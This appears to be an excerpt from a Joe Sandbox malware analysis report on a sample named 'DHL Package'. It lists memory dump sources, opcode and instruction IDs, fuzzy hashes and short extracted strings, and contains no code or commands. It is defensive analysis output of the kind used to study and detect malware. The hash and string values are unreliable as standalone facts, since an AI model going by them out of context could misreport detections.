                                                                                                • Opcode Fuzzy Hash: 3b92e7233aea51dc8064205e23666997e35820bcc8ec89697085f2706c5c4922
                                                                                                • Instruction Fuzzy Hash: 87C1B0B4E002299FEB64DF64C950BDEBBB2BB89300F1081E9D90DA7290DB745E85DF51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: D@$D@$D@
                                                                                                • API String ID: 0-3330130650
                                                                                                • Opcode ID: f4887d834199cca5d3e57a6edfb3eef01d76bc70c669bd97680d93e46a3ce889
                                                                                                • Instruction ID: d3b1c9d5d078df2d73b96aba58397e7dc426d33c24c469cdee3e8c4e279492e6
                                                                                                • Opcode Fuzzy Hash: f4887d834199cca5d3e57a6edfb3eef01d76bc70c669bd97680d93e46a3ce889
                                                                                                • Instruction Fuzzy Hash: F1B1B0B4E002299FEB64DF68C850BDDBBB2BB89300F1081E9D90DA7290DB745E85DF51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: D@$D@$pn|q
                                                                                                • API String ID: 0-2805936707
                                                                                                • Opcode ID: 55f5cd88fc953f368abf61b991d8970b0f5c27e14b5cf48603500e00210f9dcb
                                                                                                • Instruction ID: 2fa0ba4b0b0268538a8b87b337b74c4947c51ff227a97eede2f6d1bcb96dc15e
                                                                                                • Opcode Fuzzy Hash: 55f5cd88fc953f368abf61b991d8970b0f5c27e14b5cf48603500e00210f9dcb
                                                                                                • Instruction Fuzzy Hash: 1951E1B4E042499FDB04DFA8C595AEEBBF2BF89300F20802AD405AB354DB346A45CF94
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $(ksU^
                                                                                                • API String ID: 0-2965780083
                                                                                                • Opcode ID: db4f9460938538a2511df2113593b7be80ed3199d98f7f886bcf1e5b499400cb
                                                                                                • Instruction ID: 9eaac152cae702b5071074994623bfd19fa6163d5c5c42f4f4c436137a30e7f0
                                                                                                • Opcode Fuzzy Hash: db4f9460938538a2511df2113593b7be80ed3199d98f7f886bcf1e5b499400cb
                                                                                                • Instruction Fuzzy Hash: 208116757082409FEF155FB4D85966E36A2EFC53A0F204329E9229B3E1CF359D46CB82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: D@$D@
                                                                                                • API String ID: 0-548349879
                                                                                                • Opcode ID: 2821c651ecdbf5fe0d133936d4a92633a757ddf9e501570d64eb46e68b6a5460
                                                                                                • Instruction ID: 10d45480247950729ba6d5793cd6f162141f547db2d91f628abac454a640c711
                                                                                                • Opcode Fuzzy Hash: 2821c651ecdbf5fe0d133936d4a92633a757ddf9e501570d64eb46e68b6a5460
                                                                                                • Instruction Fuzzy Hash: 9751D4B4E012199FDB04DFA8C595ADEBBF2BF89300F20802AD405AB394D7346A45CF90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ;<(:^
                                                                                                • API String ID: 0-3163794458
                                                                                                • Opcode ID: 71978bf53a8d00921c9591e55d679e03af063e9b052525dc8c2b717c1c4a100a
                                                                                                • Instruction ID: bfb31d173b575d336eac72750841a7d95f752fb2390230e8a20dfed2213c6d2c
                                                                                                • Opcode Fuzzy Hash: 71978bf53a8d00921c9591e55d679e03af063e9b052525dc8c2b717c1c4a100a
                                                                                                • Instruction Fuzzy Hash: 3D52B174A41228CFDB65DF64C855BDDB7B2FB89301F1081A9D849A7390CB395E82DF84
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ;<(:^
                                                                                                • API String ID: 0-3163794458
                                                                                                • Opcode ID: 982381be4cfb706a7d9084050cbafa881a3bc57fd786766e8437ecffe46d64ee
                                                                                                • Instruction ID: f3df0da16c7da6f8336ca2b5ceccfe054c30fb6bcc3e15ebfce5802f68f46953
                                                                                                • Opcode Fuzzy Hash: 982381be4cfb706a7d9084050cbafa881a3bc57fd786766e8437ecffe46d64ee
                                                                                                • Instruction Fuzzy Hash: C452B074A41228CFDB65DF64C855BDDB7B2FB89300F1081A9D849A73A0CB395E82DF84
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ;<(:^
                                                                                                • API String ID: 0-3163794458
                                                                                                • Opcode ID: ef3e120ab5709021f77806b31886192213711784a50e43f0ab9681abad927ca9
                                                                                                • Instruction ID: b0e241ada8e5c84bbf865fd500c6b7283173b2bc31a3391eabbaef7f801ec3bb
                                                                                                • Opcode Fuzzy Hash: ef3e120ab5709021f77806b31886192213711784a50e43f0ab9681abad927ca9
                                                                                                • Instruction Fuzzy Hash: D922AF74A01228DFDB64DF64C955BDDBBB2BF89300F1081A9D849A73A0CB395E91DF44
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ksU^
                                                                                                • API String ID: 0-2795648864
                                                                                                • Opcode ID: add82dfe237d7844805ce24c394c21025fe08444528385ef273dfa8348be97ba
                                                                                                • Instruction ID: 32daf218de543b6f5ce01a47249142fbed7f9fc47aa961ed8f044cb1edddb1fd
                                                                                                • Opcode Fuzzy Hash: add82dfe237d7844805ce24c394c21025fe08444528385ef273dfa8348be97ba
                                                                                                • Instruction Fuzzy Hash: 09D1F375B082448FDB05DFA8C490A9E7BF6EFCA360F154069E501DB3A1DA74EC45CBA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: I[:9
                                                                                                • API String ID: 0-3709689739
                                                                                                • Opcode ID: cfe942a31478d34a76344fa26982e5fffbcb6d86d6df84a037e82af9495077e5
                                                                                                • Instruction ID: cc9b7477fb8b973bf07512483d64b78283380af656628a71cc695f893ed2722b
                                                                                                • Opcode Fuzzy Hash: cfe942a31478d34a76344fa26982e5fffbcb6d86d6df84a037e82af9495077e5
                                                                                                • Instruction Fuzzy Hash: 03818CB9B402158FE704DF38C858A5E7BF6FF89741B118169D006DB3A1DA34EC02CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ksU^
                                                                                                • API String ID: 0-2795648864
                                                                                                • Opcode ID: 92ba08bb8c8f3c10ce0fc46d4b6e76bcd38b71dcd967b06561f24df945d6f8e7
                                                                                                • Instruction ID: 85aebdc09c539fe4dc0cc1f416022938deab12f169df85358fc4021bdd324f95
                                                                                                • Opcode Fuzzy Hash: 92ba08bb8c8f3c10ce0fc46d4b6e76bcd38b71dcd967b06561f24df945d6f8e7
                                                                                                • Instruction Fuzzy Hash: E341B0307046408FEB199B74C8A4B3E7BA7AFC9301F14856CD9468B396DF798C06DB95
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ksU^
                                                                                                • API String ID: 0-2795648864
                                                                                                • Opcode ID: ee4da3bbdfde4717a877376d528c7a656604d7e42f30fdd5344927ec10f16701
                                                                                                • Instruction ID: b08df8e8c5de3a4fdf6ed0c50f9da378f88ee6ddb899632c5e5837c2e4047f0f
                                                                                                • Opcode Fuzzy Hash: ee4da3bbdfde4717a877376d528c7a656604d7e42f30fdd5344927ec10f16701
                                                                                                • Instruction Fuzzy Hash: D941BD35204655DFEB068F24C824AAA7BB2FF8A315F068559EC559F391DB398C08CBA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ksU^
                                                                                                • API String ID: 0-2795648864
                                                                                                • Opcode ID: 486d25c45017c207747db47c0e0be2c22b4901cb8980f84eef78a6c8507a9256
                                                                                                • Instruction ID: 54a333ffb34398ec44bf6bde0e09fd00335231e23770a319a4aa4594589fcc29
                                                                                                • Opcode Fuzzy Hash: 486d25c45017c207747db47c0e0be2c22b4901cb8980f84eef78a6c8507a9256
                                                                                                • Instruction Fuzzy Hash: 8331E871B042049FCB48DFB8C8559AE7BF5EF85341B20407DD505DB2A1DE358906CB90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ksU^
                                                                                                • API String ID: 0-2795648864
                                                                                                • Opcode ID: 2e37d79a92580581227ff13bf95bfab2d7d303a3d4d71205c1612b69ee0cae2b
                                                                                                • Instruction ID: 671e66da8fe2795f19f326627ec150ca5f9c3fba7850ab9ee5cde23d9e1a5e82
                                                                                                • Opcode Fuzzy Hash: 2e37d79a92580581227ff13bf95bfab2d7d303a3d4d71205c1612b69ee0cae2b
                                                                                                • Instruction Fuzzy Hash: 1F31D0317002449FDB049B64D864BAE7BF6BFCD300F148569E912EB391DF359C058BA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ksU^
                                                                                                • API String ID: 0-2795648864
                                                                                                • Opcode ID: 314ea9e716ee7f317d4f494d7cd6678e0a5b5c2c5b93fb9cec80b284fb2f5406
                                                                                                • Instruction ID: bcc6ebd9da5c624cfa26db45151a49ff2c748448250d5ce5080a357a5404a73e
                                                                                                • Opcode Fuzzy Hash: 314ea9e716ee7f317d4f494d7cd6678e0a5b5c2c5b93fb9cec80b284fb2f5406
                                                                                                • Instruction Fuzzy Hash: BE3127357092849FDB099B74C854A6E7FB6FF87340B2480BED4058B3A2CE355C0AC791
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ksU^
                                                                                                • API String ID: 0-2795648864
                                                                                                • Opcode ID: a85d589c84fef802dd49dab87af4b97b8a6ead3659ac8e763e860068c8ee4591
                                                                                                • Instruction ID: 89c89758c51778b23beaa4178601388a487eaf1158d31ad7cac29ae220829194
                                                                                                • Opcode Fuzzy Hash: a85d589c84fef802dd49dab87af4b97b8a6ead3659ac8e763e860068c8ee4591
                                                                                                • Instruction Fuzzy Hash: D821D0B570C2408FDB45DF78D86141A3BB5EB8A38036145AAE505CB3A2DF34ED06CBB1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: T
                                                                                                • API String ID: 0-2145084337
                                                                                                • Opcode ID: dcbda9ab62a8f73f9d30c21136b28a066edcfe30c3a5cc0c438cfeefc69e935d
                                                                                                • Instruction ID: dcccd97c618aba2e6b31d78d096ecd5fc8a88e7773e50506daf794f54dca43a4
                                                                                                • Opcode Fuzzy Hash: dcbda9ab62a8f73f9d30c21136b28a066edcfe30c3a5cc0c438cfeefc69e935d
                                                                                                • Instruction Fuzzy Hash: 2021F274D056098FDB41DFA8C9456EEBFF1BF4A300F10516AD809B7260EB341A89CFA2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ksU^
                                                                                                • API String ID: 0-2795648864
                                                                                                • Opcode ID: 030a9ba1f8342fdca7973f12d923bb635059489462dd6bccb70810f2f1883cf3
                                                                                                • Instruction ID: ca071e3d3f1f59760b65d44cd4c52cd0a979a81e6293cfc9a516c3777e23ddd8
                                                                                                • Opcode Fuzzy Hash: 030a9ba1f8342fdca7973f12d923bb635059489462dd6bccb70810f2f1883cf3
                                                                                                • Instruction Fuzzy Hash: 1901F53530C3846FC7062B74A81852A7FA6EFC7210F1444AFE945CB2A2DA25DC068756
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: I[:9
                                                                                                • API String ID: 0-3709689739
                                                                                                • Opcode ID: 748c3ea5028209048ae4d1c740c8de388c939a92e3077f0747ff51b3bda9c57a
                                                                                                • Instruction ID: 31048895dd133e145c642fe1d389fd38d7e6bfa8f10e5fb73dbbd8e3f01b0b35
                                                                                                • Opcode Fuzzy Hash: 748c3ea5028209048ae4d1c740c8de388c939a92e3077f0747ff51b3bda9c57a
                                                                                                • Instruction Fuzzy Hash: 8801E4B1E003198FDB44EFB9C80469EBBB5AF88341F10812AE419F7250EB385901CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 925975e2712618108aec23ea3dfffaa2eded1a460efda2eff25a71d017305a8c
                                                                                                • Instruction ID: e2e626dfa3d5bf66ab096ed7cfb4d34d155550a8866a7c5b209ca5a828343cc8
                                                                                                • Opcode Fuzzy Hash: 925975e2712618108aec23ea3dfffaa2eded1a460efda2eff25a71d017305a8c
                                                                                                • Instruction Fuzzy Hash: 03423A31604205DFDB15CF68C984AAEBBF2BF88312F15855AE825DF2A1D734EC45CB62
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2ee910c220e4c53498ec85909049e4e0e2ef4fb678671aca9b1822c83cec34e7
                                                                                                • Instruction ID: 6f5f0c09e87bdf219258e3989fcf08e2c8a90806f6787f0a915ace39778df51d
                                                                                                • Opcode Fuzzy Hash: 2ee910c220e4c53498ec85909049e4e0e2ef4fb678671aca9b1822c83cec34e7
                                                                                                • Instruction Fuzzy Hash: EA421C34A002198FEB55EBE0C850BDEBBB2EF84300F1085A9D50A7B3A5CF355E95AF55
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5cabae4961627925a04bcbe432abbcdc33df992dee94ada279c336a7502549be
                                                                                                • Instruction ID: c2722863a23422397237ddcbeb875b789b4c9ed870b6f2a55afe297eb4efc75d
                                                                                                • Opcode Fuzzy Hash: 5cabae4961627925a04bcbe432abbcdc33df992dee94ada279c336a7502549be
                                                                                                • Instruction Fuzzy Hash: 19128A30A04605CFCB15CF68E885AAEBBF2BF88315F158599E869DF2A1D730EC45CB50
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d8b07739746d1a7ad570cea22118d49f63c2c9971c48bb10e4a7cd048c83c3e6
                                                                                                • Instruction ID: 59148fc79dfeba21f84034583c8a38c886a6c55f0b1f21b7a0308deb3ce3bcc7
                                                                                                • Opcode Fuzzy Hash: d8b07739746d1a7ad570cea22118d49f63c2c9971c48bb10e4a7cd048c83c3e6
                                                                                                • Instruction Fuzzy Hash: A4F13D75A40215CFCB04CFA8C9849ADBBF2FF88311B568169E915AB371DB34EC45CB51
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 22866da07d4690b5a821169d823d7963cfb8485d68625e3bb9a5a93bdbd01771
                                                                                                • Instruction ID: 2176563b54795c6900c51963035ea11c1234da56df40a985932a877ff4bb2219
                                                                                                • Opcode Fuzzy Hash: 22866da07d4690b5a821169d823d7963cfb8485d68625e3bb9a5a93bdbd01771
                                                                                                • Instruction Fuzzy Hash: EE51DF30026B43AFE3052B30ADBC26E7B74FB0F7137456D46E10E958329F791289CA61
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fed44faab8f1b1e91697fda47d5277a6913c4d8c35a06ef299570ead7f6f7ec8
                                                                                                • Instruction ID: 2cd1cf7b1db76a319ca85a884484f5f89bc645327e41766b5d6c21c3ef8636a6
                                                                                                • Opcode Fuzzy Hash: fed44faab8f1b1e91697fda47d5277a6913c4d8c35a06ef299570ead7f6f7ec8
                                                                                                • Instruction Fuzzy Hash: 3181A534B00605CFCB54CF68C494A6AB7B2FF89312B55806AE826EF3A5D735DC49CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e24e9b4100ffe312feb4628831cb295509faef3e803bb45e8f62fed33fbb0a1c
                                                                                                • Instruction ID: e325d90dfb023a5fc68ad5927c40267279dfa63279c91c668afac932cf4b8473
                                                                                                • Opcode Fuzzy Hash: e24e9b4100ffe312feb4628831cb295509faef3e803bb45e8f62fed33fbb0a1c
                                                                                                • Instruction Fuzzy Hash: E2919A31A00249DFDF05CFA4C844ADEBFB2FF8A311F14815AE815AF261D771A859CBA5
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 17f3f6d1a073b1f84bcd40db31ac461c45360c9e5f15a5844fc79e58962dcbfa
                                                                                                • Instruction ID: 30cde5eba711c1b333a3e3f5c2709e607bba2b46f5c3522898d6c7b6cee38f32
                                                                                                • Opcode Fuzzy Hash: 17f3f6d1a073b1f84bcd40db31ac461c45360c9e5f15a5844fc79e58962dcbfa
                                                                                                • Instruction Fuzzy Hash: C6716D71F0421A9BDB06DFA8C8506AEBBF6AFC9700F148129E415BB381DE34AD45CBD5
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 369285726e91cdc84cd8d250e6964945675601bef74d16c820f5a752a0853dba
                                                                                                • Instruction ID: 6147045eb4ab1839e33557cc023bca6d22bcdc5beb313be4f859acd7abf1ebdc
                                                                                                • Opcode Fuzzy Hash: 369285726e91cdc84cd8d250e6964945675601bef74d16c820f5a752a0853dba
                                                                                                • Instruction Fuzzy Hash: 4351F2B6A0C3059FDB148F79D844AABBBF9EBC53A4B14856EE418D7350D631E809CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f1959984d637a71a6611a7d5dc3c89a90d01d1a5d9835a543a6b4da9579e003c
                                                                                                • Instruction ID: 17063a6bd60ce4f180e2c0f00c404a0672352a3abfc6a94c97ea64b37135ca13
                                                                                                • Opcode Fuzzy Hash: f1959984d637a71a6611a7d5dc3c89a90d01d1a5d9835a543a6b4da9579e003c
                                                                                                • Instruction Fuzzy Hash: 08A1D434A012299FEB65DFB0C951B9DBBB2FF88300F108199D849673A5CB385E91DF85
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1e19608d0a22ef67d009b3c55b3e462d315b1571e3127d23538af56d9b1027b5
                                                                                                • Instruction ID: 7f948d269b4e4dc0ac2132b6565bf4394de0005338eed88630fbe9f1586f2f24
                                                                                                • Opcode Fuzzy Hash: 1e19608d0a22ef67d009b3c55b3e462d315b1571e3127d23538af56d9b1027b5
                                                                                                • Instruction Fuzzy Hash: 33715834708605CFDB14DF28E889A6A7BE6AF49302F1540A9E826CF3B1DB70DC45CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ffe69a0124e2583085f76817805099a8c6885f5977ffeacfec9d788517702d3d
                                                                                                • Instruction ID: 9f0ec0fb6b033b513165cc91e983879f1d30c65a09fa7be55a1afb3b1809ff01
                                                                                                • Opcode Fuzzy Hash: ffe69a0124e2583085f76817805099a8c6885f5977ffeacfec9d788517702d3d
                                                                                                • Instruction Fuzzy Hash: 69817E74E412289FEB65DF29C951BDDBBB2BF89300F1081AAD849A7250DB745E818F41
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 20a27a1c760430806357299851ffd83e4fa1d55df22ca3cb1993a538e5759673
                                                                                                • Instruction ID: 5cca9a3cb954218a9f2cfbcaf69929ad4264b6ad92a696c3c26fcc296f0c96fb
                                                                                                • Opcode Fuzzy Hash: 20a27a1c760430806357299851ffd83e4fa1d55df22ca3cb1993a538e5759673
                                                                                                • Instruction Fuzzy Hash: D361C1B5E002099FEB08DFE9D940ADEBBF2AF88340F14C129E518AB355EB349945CF55
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 594b6c6c87c261bd8c21ceec13b094eb0066d6dd0676fc7257704334eae95608
                                                                                                • Instruction ID: 7eae3d71276d17fd3a38437c73ccbe6f86eac06bd09e26d4cabcc68cb3a31914
                                                                                                • Opcode Fuzzy Hash: 594b6c6c87c261bd8c21ceec13b094eb0066d6dd0676fc7257704334eae95608
                                                                                                • Instruction Fuzzy Hash: 8C519B30462B03EFE2042B30ADBC57EBB64FB4F723745AD06E10E958359F781289CA61
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dff9edbb920720da069331a4211ef1d053545cb929e385763ee5417d7232c5ac
                                                                                                • Instruction ID: 5baa4460e637334c73f8ab7ae2fbad154915ce3d3974e313e97963de4bb8ad20
